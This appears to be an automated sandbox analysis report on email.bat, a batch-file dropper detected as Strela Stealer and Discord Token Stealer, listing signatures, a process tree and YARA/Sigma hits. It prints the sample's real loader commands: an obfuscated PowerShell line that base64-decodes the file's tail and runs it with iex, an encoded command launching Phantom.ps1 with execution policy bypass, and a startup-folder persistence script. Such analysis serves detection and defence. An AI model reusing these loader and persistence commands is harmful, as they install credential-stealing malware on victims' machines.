
Windows Analysis Report
email.bat

Overview

General Information

Sample name: email.bat
Analysis ID: 1629935
MD5: d083c2b26222174127ff97877937148e
SHA1: 6695b33afb320669e877c7d8ab80301372deb4bd
SHA256: 9b5aab389e76144585b06720fb08ccbd92450f52f5b13c8bca7b3a53d7aa1a56
Tags: 213-209-150-200, bat, user-JAMESWT_MHT

Detection

Discord Token Stealer, Strela Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Powershell Decrypt And Execute Base64 Data
Yara detected Discord Token Stealer
Yara detected Generic Stealer
Yara detected Powershell decode and execute
Yara detected Strela Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Creates a thread in another existing process (thread injection)
Drops script or batch files to the startup folder
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Injects code into the Windows Explorer (explorer.exe)
Joe Sandbox ML detected suspicious sample
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell IEX Execution Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Inline Execution From A File
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 560 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\email.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2908 cmdline: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 2720 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 5296 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA2A.tmp" "c:\Users\user\AppData\Local\Temp\mlbsu2za\CSCA5922EEFCE0C4CCF862EBFA9D2B24469.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmd.exe (PID: 7320 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkkijTOJSHGJxxcmgeA.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7380 cmdline: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA= MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
              • taskkill.exe (PID: 7580 cmdline: "C:\Windows\system32\taskkill.exe" /IM ping.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
              • cmd.exe (PID: 7632 cmdline: "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • PING.EXE (PID: 7696 cmdline: C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t MD5: B3624DD758CCECF93A1226CEF252CA12)
              • csc.exe (PID: 7992 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zozwmnym.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
                • cvtres.exe (PID: 8008 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES50A7.tmp" "c:\Users\user\AppData\Local\Temp\CSC45E487DD8415477BBDD6263064315E51.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • taskkill.exe (PID: 7032 cmdline: "C:\Windows\system32\taskkill.exe" /IM ping.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • cmd.exe (PID: 5296 cmdline: "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 7032 cmdline: C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t MD5: B3624DD758CCECF93A1226CEF252CA12)
      • csc.exe (PID: 7252 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 7280 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES23DA.tmp" "c:\Users\user\AppData\Local\Temp\fhrgxrvn\CSCCE48297965FB4312A543AE9B3ACACFC0.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000017.00000002.2491155636.00000000028E0000.00000040.00000001.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x2cc8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x625e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000017.00000002.2509704658.0000000006C50000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000A.00000002.2230659559.0000000007410000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000006.00000000.1728817943.00000000011B0000.00000040.00000001.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x2cd2:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x6268:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Source | Rule | Description | Author | Strings
23.2.PING.EXE.6c50000.4.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
10.2.PING.EXE.7410000.4.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security

Source | Rule | Description | Author | Strings
amsi64_2908.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security

              System Summary

              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine|base64offset|contains: <!., Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\email.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 560, ParentProcessName: cmd.exe, ProcessCommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", ProcessId: 2908, ProcessName: powershell.exe
Source: Thread created | Author: Perez Diego (@darkquassar), oscd.community | Data: EventID: 8, SourceImage: C:\Windows\SysWOW64\PING.EXE, SourceProcessId: 7032, StartAddress: 72C3B510, TargetImage: C:\Windows\System32\taskkill.exe, TargetProcessId: 7032
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, CommandLine: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, CommandLine|base64offset|contains: !, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkkijTOJSHGJxxcmgeA.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7320, ParentProcessName: cmd.exe, ProcessCommandLine: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, ProcessId: 7380, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, CommandLine: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, CommandLine|base64offset|contains: !, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkkijTOJSHGJxxcmgeA.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7320, ParentProcessName: cmd.exe, ProcessCommandLine: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, ProcessId: 7380, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1, CommandLine|base64offset|contains: E, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7380, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1, ProcessId: 7496, ProcessName: powershell.exe
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1, CommandLine|base64offset|contains: E, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7380, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1, ProcessId: 7496, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2908, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline", ProcessId: 2720, ProcessName: csc.exe
              Source: Process startedAuthor: frack113: Data: Command: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine|base64offset|contains: <!., Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\email.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 560, ParentProcessName: cmd.exe, ProcessCommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", ProcessId: 2908, ProcessName: powershell.exe
              Source: Process startedAuthor: frack113: Data: Command: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, CommandLine: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, CommandLine|base64offset|contains: !, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkkijTOJSHGJxxcmgeA.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7320, ParentProcessName: cmd.exe, ProcessCommandLine: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, ProcessId: 7380, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2908, TargetFilename: C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine|base64offset|contains: <!., Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\email.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 560, ParentProcessName: cmd.exe, ProcessCommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", ProcessId: 2908, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2908, TargetFilename: C:\Users\user\AppData\Local\Phantom.ps1

              Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\explorer.exe, ProcessId: 2580, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkkijTOJSHGJxxcmgeA.bat
